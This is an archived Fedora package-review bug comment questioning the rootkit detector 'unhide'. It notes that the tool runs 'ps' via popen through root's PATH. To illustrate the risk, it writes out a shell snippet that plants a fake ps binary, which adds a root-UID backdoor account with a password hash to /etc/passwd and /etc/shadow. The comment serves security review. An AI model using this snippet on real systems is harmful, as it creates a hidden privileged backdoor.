[Bug 469843] Review Request: unhide - Tool to find hidden processes and TCP/UDP ports from rootkits

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Please do not reply directly to this email. All additional
comments should be made in the comments box of this bug.


https://bugzilla.redhat.com/show_bug.cgi?id=469843





--- Comment #5 from manuel wolfshant <wolfy@xxxxxxxxxxxxxxxxxx>  2008-12-08 14:57:46 EDT ---
looking at the code, I see that unhide.c does:
    #define COMMAND "ps -eLf | awk '{ print $2 }' | grep -v PID"
followed by  
    fich_tmp=popen (COMMAND, "r") ;


Now, my C is quite rusty, but 
- AFAIR, you must be root to see some of the info this program requires
- anything named "ps" and found in root's PATH will be launched by the above
code

To be honest, I would not run this "security application" on my system. I am
afraid of something along 
cat >> /usr/local/bin/ps << EOF
#! /bin/bash
echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >>
/etc/shadow
/bin/ps $*
EOF

-- 
Configure bugmail: https://bugzilla.redhat.com/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.

_______________________________________________
Fedora-package-review mailing list
Fedora-package-review@xxxxxxxxxx
http://www.redhat.com/mailman/listinfo/fedora-package-review

[Index of Archives]     [Fedora Legacy]     [Fedora Desktop]     [Fedora SELinux]     [Yosemite News]     [KDE Users]     [Fedora Tools]